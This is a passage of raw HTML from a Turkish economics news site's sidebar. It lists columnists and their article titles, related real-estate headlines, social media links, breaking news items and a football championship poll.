            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/116/bahar-aray-marka-stratejisti" title="Bahar Aray / Marka Stratejisti">Bahar Aray / Marka Stratejisti</a></h4>
              <a href="http://www.gazeteekonomi.com/burcu-kosem-kimdir-makale,195720.html" title="Burcu Kösem kimdir?" >Burcu Kösem kimdir?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/tek-gundemin-pandemi-mi-makale,195706.html" title="Tek gündemin pandemi mi? " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Ekran_Resmi_2019-02-16_12.56.13.png" alt="Ayşen Laçinel - İletişim ve İnsan Kaynakları Uzmanı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/59/aysen-lacinel-iletisim-ve-insan-kaynaklari-uzmani" title="Ayşen Laçinel - İletişim ve İnsan Kaynakları Uzmanı">Ayşen Laçinel - İletişim ve İnsan Kaynakları Uzmanı</a></h4>
              <a href="http://www.gazeteekonomi.com/tek-gundemin-pandemi-mi-makale,195706.html" title="Tek gündemin pandemi mi? " >Tek gündemin pandemi mi? </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/yasayan-muze-kenan-yavuz-etnografya-muzesi-makale,195659.html" title="“Yaşayan Müze” Kenan Yavuz Etnografya Müzesi" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Ekran_Resmi_2019-03-21_21.52.37.png" alt="Talip Bayram - Gazeteci Yazar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/113/talip-bayram-gazeteci-yazar" title="Talip Bayram - Gazeteci Yazar">Talip Bayram - Gazeteci Yazar</a></h4>
              <a href="http://www.gazeteekonomi.com/yasayan-muze-kenan-yavuz-etnografya-muzesi-makale,195659.html" title="“Yaşayan Müze” Kenan Yavuz Etnografya Müzesi" >“Yaşayan Müze” Kenan Yavuz Etnografya Müzesi</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/beyninize-cip-taktirir-misiniz-makale,195657.html" title="Beyninize çip taktırır mısınız?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/fikri-turkel.jpg" alt="Fikri Türkel">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/27/fikri-turkel" title="Fikri Türkel">Fikri Türkel</a></h4>
              <a href="http://www.gazeteekonomi.com/beyninize-cip-taktirir-misiniz-makale,195657.html" title="Beyninize çip taktırır mısınız?" >Beyninize çip taktırır mısınız?</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/sifir-arac-piyasasi-dortlu-flasoru-yakti-ikinci-el-bosta-kaldi-makale,195652.html" title="Sıfır araç piyasası dörtlü flaşörü yaktı, ikinci el boşta kaldı" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/ylpnssq5e4lslieg1p5n.jpg" alt="Burak Çiçek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/122/burak-cicek" title="Burak Çiçek">Burak Çiçek</a></h4>
              <a href="http://www.gazeteekonomi.com/sifir-arac-piyasasi-dortlu-flasoru-yakti-ikinci-el-bosta-kaldi-makale,195652.html" title="Sıfır araç piyasası dörtlü flaşörü yaktı, ikinci el boşta kaldı" >Sıfır araç piyasası dörtlü flaşörü yaktı, ikinci el boşta kaldı</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/komplo-mu-korona-mi-makale,195524.html" title="Komplo mu, korona mı?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/saadettin_cay.jpg" alt="Saadettin Çay">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/82/saadettin-cay" title="Saadettin Çay">Saadettin Çay</a></h4>
              <a href="http://www.gazeteekonomi.com/komplo-mu-korona-mi-makale,195524.html" title="Komplo mu, korona mı?" >Komplo mu, korona mı?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/kuresel-dusman-covit19-makale,195522.html" title="KÜRESEL DÜŞMAN, Covit19" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/serap.jpg" alt="Serap Girgin Baykal">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/127/serap-girgin-baykal" title="Serap Girgin Baykal">Serap Girgin Baykal</a></h4>
              <a href="http://www.gazeteekonomi.com/kuresel-dusman-covit19-makale,195522.html" title="KÜRESEL DÜŞMAN, Covit19" >KÜRESEL DÜŞMAN, Covit19</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/finansal-yatirim-araclari-alarm-vermeye-basladi-makale,195509.html" title="Finansal yatırım araçları alarm vermeye başladı " >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/esfender-korkmaz_1.jpg" alt="Esfender Korkmaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/46/esfender-korkmaz" title="Esfender Korkmaz">Esfender Korkmaz</a></h4>
              <a href="http://www.gazeteekonomi.com/finansal-yatirim-araclari-alarm-vermeye-basladi-makale,195509.html" title="Finansal yatırım araçları alarm vermeye başladı " >Finansal yatırım araçları alarm vermeye başladı </a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/hacikamiloglu-polisan-da-yesil-ruzgarlar-estiriyor-makale,195794.html" title="Hacıkamiloğlu Polisan&#039;da yeşil rüzgarlar estiriyor" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Ekran_Resmi_2019-08-08_15.52.13.png" alt="Celal Toprak">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/3/celal-toprak" title="Celal Toprak">Celal Toprak</a></h4>
              <a href="http://www.gazeteekonomi.com/hacikamiloglu-polisan-da-yesil-ruzgarlar-estiriyor-makale,195794.html" title="Hacıkamiloğlu Polisan&#039;da yeşil rüzgarlar estiriyor" >Hacıkamiloğlu Polisan&#039;da yeşil rüzgarlar estiriyor</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/banglades-disisleri-bakani-banglades-turkleri-bekliyor-makale,195787.html" title="Bangladeş Dışişleri Bakanı: Bangladeş Türkleri bekliyor" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/ahmet-coskunaydin.jpg" alt="Ahmet Coşkunaydın">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/49/ahmet-coskunaydin" title="Ahmet Coşkunaydın">Ahmet Coşkunaydın</a></h4>
              <a href="http://www.gazeteekonomi.com/banglades-disisleri-bakani-banglades-turkleri-bekliyor-makale,195787.html" title="Bangladeş Dışişleri Bakanı: Bangladeş Türkleri bekliyor" >Bangladeş Dışişleri Bakanı: Bangladeş Türkleri bekliyor</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/at-mi-jokey-mi-makale,195779.html" title="At mı? Jokey mi?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/yilmaz-parlar.jpg" alt="Yılmaz Parlar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/51/yilmaz-parlar" title="Yılmaz Parlar">Yılmaz Parlar</a></h4>
              <a href="http://www.gazeteekonomi.com/at-mi-jokey-mi-makale,195779.html" title="At mı? Jokey mi?" >At mı? Jokey mi?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/huzun-baska-bir-yuzun-yuzun-makale,195765.html" title="Hüzün başka bir yüzün. Yüzün…" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/erkan.jpg" alt="Erkan Zing">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/67/erkan-zing" title="Erkan Zing">Erkan Zing</a></h4>
              <a href="http://www.gazeteekonomi.com/huzun-baska-bir-yuzun-yuzun-makale,195765.html" title="Hüzün başka bir yüzün. Yüzün…" >Hüzün başka bir yüzün. Yüzün…</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/gundemde-turizm-var-makale,195670.html" title="Gündemde turizm var" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Ekran_Resmi_2019-02-18_10.16.23_1.png" alt="Dr. Burcu AKKAYA TELCİ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/107/dr-burcu-akkaya-telci" title="Dr. Burcu AKKAYA TELCİ">Dr. Burcu AKKAYA TELCİ</a></h4>
              <a href="http://www.gazeteekonomi.com/gundemde-turizm-var-makale,195670.html" title="Gündemde turizm var" >Gündemde turizm var</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/iyi-geceler-hayat-makale,195692.html" title="İyi geceler HAYAT..." >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/PRofil.jpg" alt="Ersin Varlık Aşlamacı Felsefe Öğretmeni / Yazar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/109/ersin-varlik-aslamaci-felsefe-ogretmeni-yazar" title="Ersin Varlık Aşlamacı Felsefe Öğretmeni / Yazar">Ersin Varlık Aşlamacı Felsefe Öğretmeni / Yazar</a></h4>
              <a href="http://www.gazeteekonomi.com/iyi-geceler-hayat-makale,195692.html" title="İyi geceler HAYAT..." >İyi geceler HAYAT...</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/gezdim-gordum-yedim-kisim-2-ordu-makale,195679.html" title="Gezdim, gördüm, yedim -Kısım 2- Ordu" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/elif.jpg" alt="Elif Attepe">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/112/elif-attepe" title="Elif Attepe">Elif Attepe</a></h4>
              <a href="http://www.gazeteekonomi.com/gezdim-gordum-yedim-kisim-2-ordu-makale,195679.html" title="Gezdim, gördüm, yedim -Kısım 2- Ordu" >Gezdim, gördüm, yedim -Kısım 2- Ordu</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/koronavirus-salgini-icinde-tek-gecede-104-bin-dolar-gelir-makale,195498.html" title="Koronavirüs salgını içinde tek gecede 104 bin dolar gelir" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/volkan.jpg" alt="Volkan Işılay">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/123/volkan-isilay" title="Volkan Işılay">Volkan Işılay</a></h4>
              <a href="http://www.gazeteekonomi.com/koronavirus-salgini-icinde-tek-gecede-104-bin-dolar-gelir-makale,195498.html" title="Koronavirüs salgını içinde tek gecede 104 bin dolar gelir" >Koronavirüs salgını içinde tek gecede 104 bin dolar gelir</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/dijital-ekonomi-makale,195764.html" title="Dijital Ekonomi" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/Nilufer.jpg" alt="Nilüfer Yücedağ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/125/nilufer-yucedag" title="Nilüfer Yücedağ">Nilüfer Yücedağ</a></h4>
              <a href="http://www.gazeteekonomi.com/dijital-ekonomi-makale,195764.html" title="Dijital Ekonomi" >Dijital Ekonomi</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/ders-yili-nasil-baslayacak-makale,195665.html" title="Ders Yılı Nasıl Başlayacak?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/SIMASLANOGLU.jpg" alt="Sim Aslanoğlu">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/130/sim-aslanoglu" title="Sim Aslanoğlu">Sim Aslanoğlu</a></h4>
              <a href="http://www.gazeteekonomi.com/ders-yili-nasil-baslayacak-makale,195665.html" title="Ders Yılı Nasıl Başlayacak?" >Ders Yılı Nasıl Başlayacak?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/ticaret-savaslarinda-galibiyet-yoktur-makale,195781.html" title="Ticaret savaşlarında galibiyet yoktur" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/aziz.jpeg" alt="Dr.Aziz İlgazi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/141/draziz-ilgazi" title="Dr.Aziz İlgazi">Dr.Aziz İlgazi</a></h4>
              <a href="http://www.gazeteekonomi.com/ticaret-savaslarinda-galibiyet-yoktur-makale,195781.html" title="Ticaret savaşlarında galibiyet yoktur" >Ticaret savaşlarında galibiyet yoktur</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/gozler-akademiden-cikan-yenilikci-girisimlerde-makale,195780.html" title="Gözler Akademiden Çıkan Yenilikçi Girişimlerde" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/duygu.jpg" alt="Dr. Öğr. Üyesi Duygu Hıdıroğlu">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/142/dr-ogr-uyesi-duygu-hidiroglu" title="Dr. Öğr. Üyesi Duygu Hıdıroğlu">Dr. Öğr. Üyesi Duygu Hıdıroğlu</a></h4>
              <a href="http://www.gazeteekonomi.com/gozler-akademiden-cikan-yenilikci-girisimlerde-makale,195780.html" title="Gözler Akademiden Çıkan Yenilikçi Girişimlerde" >Gözler Akademiden Çıkan Yenilikçi Girişimlerde</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/farkinda-misin-makale,195773.html" title="Farkında mısın?" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/zehra.jpeg" alt="Zehra Ayvacıoğlu">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/143/zehra-ayvacioglu" title="Zehra Ayvacıoğlu">Zehra Ayvacıoğlu</a></h4>
              <a href="http://www.gazeteekonomi.com/farkinda-misin-makale,195773.html" title="Farkında mısın?" >Farkında mısın?</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.gazeteekonomi.com/eskisi-yenisiyle-kooperatifcilik-ve-kadin-kooperatifleri-makale,195766.html" title="ESKİSİ YENİSİYLE KOOPERATİFÇİLİK VE KADIN KOOPERATİFLERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.gazeteekonomi.com/images/yazarlar/murat.jpeg" alt="Murat Köysüren">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.gazeteekonomi.com/profil/144/murat-koysuren" title="Murat Köysüren">Murat Köysüren</a></h4>
              <a href="http://www.gazeteekonomi.com/eskisi-yenisiyle-kooperatifcilik-ve-kadin-kooperatifleri-makale,195766.html" title="ESKİSİ YENİSİYLE KOOPERATİFÇİLİK VE KADIN KOOPERATİFLERİ" >ESKİSİ YENİSİYLE KOOPERATİFÇİLİK VE KADIN KOOPERATİFLERİ</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  <div class="reklam reklam204"><a href="http://www.gazeteekonomi.com/banner.php?id=12" target="_blank" rel="nofollow"><img src="http://www.gazeteekonomi.com/thumb.php?src=http://www.gazeteekonomi.com/images/banner/biotrend-356-120.png&w=356&h=120&q=80" width="356" height="120" style="width:356px;height: 120px;border:0" alt="banner12" class="img-responsive"/></a></div>
  <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.gazeteekonomi.com/emlak/ekolojik-yerlesime-yoneldi-kanadali-ortak-aldi-h584199.html"  title="Ekolojik yerleşime yöneldi Kanadalı ortak aldı">
        <img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/ekolojik_yerlesime_yoneldi_kanadali_ortak_aldi_h584199_e6be6.jpg" alt="Ekolojik yerleşime yöneldi Kanadalı ortak aldı" />
        <span>Ekolojik yerleşime yöneldi Kanadalı ortak aldı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.gazeteekonomi.com/emlak/yuh-size-yanan-yerleri-satisa-cikardilar-h584152.html"  title="Yuh size!.. Yanan yerleri satışa çıkardılar">
        <img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/yuh_size_yanan_yerleri_satisa_cikardilar_h584152_be0a4.jpg" alt="Yuh size!.. Yanan yerleri satışa çıkardılar" />
        <span>Yuh size!.. Yanan yerleri satışa çıkardılar</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.gazeteekonomi.com/emlak/musilaj-emlak-fiyatlarini-da-vurdu-h584136.html"  title="Müsilaj emlak fiyatlarını da vurdu">
        <img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/07/musilaj_emlak_fiyatlarini_da_vurdu_h584136_51228.jpg" alt="Müsilaj emlak fiyatlarını da vurdu" />
        <span>Müsilaj emlak fiyatlarını da vurdu</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.gazeteekonomi.com/emlak/esnek-ofis-e-tasindi-h584047.html"  title="Esnek Ofis&#039;e taşındı">
        <img src="http://www.gazeteekonomi.com/images/haberler/thumbs/no_headline.png" alt="Esnek Ofis&#039;e taşındı" />
        <span>Esnek Ofis&#039;e taşındı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.gazeteekonomi.com/emlak/dikkat-evinizi-hemen-alin-h583954.html"  title="Dikkat! Evinizi hemen alın..">
        <img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/06/dikkat-evinizi-hemen-alin_eadd8.jpg" alt="Dikkat! Evinizi hemen alın.." />
        <span>Dikkat! Evinizi hemen alın..</span>
      </a>
    </div>
      </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="http://facebook.com/GztEkonomi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="http://facebook.com/GztEkonomi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="http://twitter.com/GazeteEkonomi" class="hs-sdch" target="blank" id="followers">1.8B</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="http://twitter.com/GazeteEkonomi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.gazeteekonomi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bugün Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html" title="Mermer fuarına damgasını vurdu" class="en-left"><img src="http://www.gazeteekonomi.com/images/haberler/thumbs/2021/08/mermer_fuarina_damgasini_vurdu_h584249_5c4b5.jpg" alt="Mermer fuarına damgasını vurdu" ></a><div class="en-right"><a href="http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html" title="" ><span class="en-hit">1.</span> <strong>Mermer fuarına damgasını vurdu</strong> <span class="en-spot en-hidden">Temmer Marble Yönetim Kurulu Başkanı Rüstem Çetinkaya, Anamorfoz...</span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
            </div>
  </div>

  
<!-- POPULER GALERİLER -->
<div class="popgal">
  <div class="header">
    <h5>Popüler Galeriler</h5>
  </div>
  <div class="content">
    <div id="popgal" class="carousel slid">
      <div class="carousel-inner">
              </div>
      <ol class="carousel-indicators carousel-hover">
              </ol>
    </div>
  </div>
</div>


  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.gazeteekonomi.com/emlak/ara-vermeden-ev-yapmaya-devam-ediyor-h584250.html" title="Ara vermeden ev yapmaya devam ediyor" >Ara vermeden ev yapmaya devam ediyor</a></li>
          
          <li><a href="http://www.gazeteekonomi.com/ekonomi/mermer-fuarina-damgasini-vurdu-h584249.html" title="Mermer fuarına damgasını vurdu" >Mermer fuarına damgasını vurdu</a></li>
          
          <li><a href="http://www.gazeteekonomi.com/ekonomi/yenilenebilir-enerji-dediler-avrupa-dan-yatirimi-aldilar-h584248.html" title="Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar" >Yenilenebilir enerji dediler Avrupa&#039;dan yatırımı aldılar</a></li>
          
          <li><a href="http://www.gazeteekonomi.com/ekonomi-finans/oyun-basliyor-h584247.html" title="Oyun başlıyor" >Oyun başlıyor</a></li>
          
          <li class="last"><a href="http://www.gazeteekonomi.com/ekonomi/kripto-para-yorumu-yapacak-h584246.html" title="Kripto para yorumu yapacak" >Kripto para yorumu yapacak</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="http://www.gazeteekonomi.com/gundem/guvenilirlik-egitimi-maltepeden-basliyor-h583118.html" title="Güvenilirlik eğitimi Maltepeden başlıyor" >Güvenilirlik eğitimi Maltepe’den başlıyor</a></li>
          
          <li><a href="http://www.gazeteekonomi.com/ekonomi/sanayi-odasi-baskanlari-yatirim-icin-hukuk-reformu-istedi-h583098.html" title="Sanayi odası başkanları yatırım için ‘Hukuk reformu istedi " >Sanayi odası başkanları yatırım için ‘Hukuk reformu’ istedi </a></li>
          
          <li><a href="http://www.gazeteekonomi.com/genel/gida-sektorunde-turkiyenin-en-hizli-buyuyenleri-arasinda-h582773.html" title="Gıda sektöründe Türkiye#39;nin en hızlı büyüyenleri arasında" >Gıda sektöründe Türkiye&#39;nin en hızlı büyüyenleri arasında</a></li>
          
          <li><a href="http://www.gazeteekonomi.com/ekonomi/kuresel-felaketin-panzehiri-ulkeler-arasi-is-birligi-h582550.html" title="Küresel felaketin panzehiri ülkeler arası iş birliği" >Küresel felaketin panzehiri ülkeler arası iş birliği</a></li>
          
          <li class="last"><a href="http://www.gazeteekonomi.com/sektor/otomotiv-ve-mobilya-icin-esnek-sungeri-uretti-h581922.html" title="Otomotiv ve mobilya için esnek süngeri üretti" >Otomotiv ve mobilya için esnek süngeri üretti</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
  <!-- ALINTI YAZARLAR -->
  <div id="ayazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.gazeteekonomi.com/yazarlar-alinti.html" title="Alıntı Yazarlar">Alıntı Yazarlar</a></h5>
          </div>
    <div class="content">
      <div class="item">
          </div>
    </div>
  </div>

  
  <!-- ANKET -->
    <div class="hs-poll">
      <div class="header">
        <h5><span class="glyphicons check">Anket</span> <a href="http://www.gazeteekonomi.com/anketler.html" class="all">Tüm Anketler</a> </h5>
      </div>
      <div id="anket5">
        <form id="anketformu5" name="anket" method="post">
        <div class="hs-poll-head with-image true single"><div class="hs-poll-question">Sizce bu yıl şampiyon hangi takım olur<div class="hs-poll-date tarih-once" data-date="2021-08-19 20:22:21">2021-08-19 20:22:21</div><div class="clearfix"></div><a href="http://www.gazeteekonomi.com/sizce-bu-yil-sampiyon-hangi-takim-olur-anket,5.html" class="btn btn-small btn-poll hs-ripple">ANKETE KATIL</a></div><div class="hs-poll-image"><img src="http://www.gazeteekonomi.com/images/anketler/5/sizce-bu-yil-sampiyon-hangi-takim-olur_5.Jpeg" alt="Sizce bu yıl şampiyon hangi takım olur"></div></div><div class="hs-poll-options with-image hs-secenek-buyuk"><input name="aid" class="radio" type="hidden" value="5" /><div class="hs-poll-option radio anket-secenek"><label class="hs-poll-label" for="sec16">
														<img src=http://www.gazeteekonomi.com/images/anketler/5/anket-secenek_16.jpg class="anket-sec-resim">
													<input type="radio" class="hs-bgc-cl" name="OY5" id="sec16" value="16">
													<div class="hs-poll-option-text hs-cl">
														<span class="anket-sec-label">Beşiktaş</span>
													</div>
													<div class="clearfix"></div>
												</label>
											</div><div class="hs-poll-option radio anket-secenek"><label class="hs-poll-label" for="sec17">
														<img src=http://www.gazeteekonomi.com/images/anketler/5/anket-secenek_17.jpg class="anket-sec-resim">
													<input type="radio" class="hs-bgc-cl" name="OY5" id="sec17" value="17">
													<div class="hs-poll-option-text hs-cl">
														<span class="anket-sec-label">Fenerbahçe</span>
													</div>
													<div class="clearfix"></div>
												</label>
											</div><div class="hs-poll-option radio anket-secenek"><label class="hs-poll-label" for="sec18">
														<img src=http://www.gazeteekonomi.com/images/anketler/5/anket-secenek_18.jpg class="anket-sec-resim">
													<input type="radio" class="hs-bgc-cl" name="OY5" id="sec18" value="18">
													<div class="hs-poll-option-text hs-cl">
														<span class="anket-sec-label">Galatasaray</span>
													</div>
													<div class="clearfix"></div>
												</label>
											</div><div class="hs-poll-option radio anket-secenek"><label class="hs-poll-label" for="sec19">
														<img src=http://www.gazeteekonomi.com/images/anketler/5/trabzonspor_19.jpg class="anket-sec-resim">
													<input type="radio" class="hs-bgc-cl" name="OY5" id="sec19" value="19">
													<div class="hs-poll-option-text hs-cl">
														<span class="anket-sec-label">Trabzonspor</span>
													</div>
													<div class="clearfix"></div>
												</label>
											</div></div><div class="clearfix"></div><div class="alert alert-warning" style="display:none">Lütfen seçiminizi yapınız.</div>
								<div class="alert alert-error" style="display:none">Daha önce oy kullandınız.</div>
								<div class="hs-poll-control clearfix">
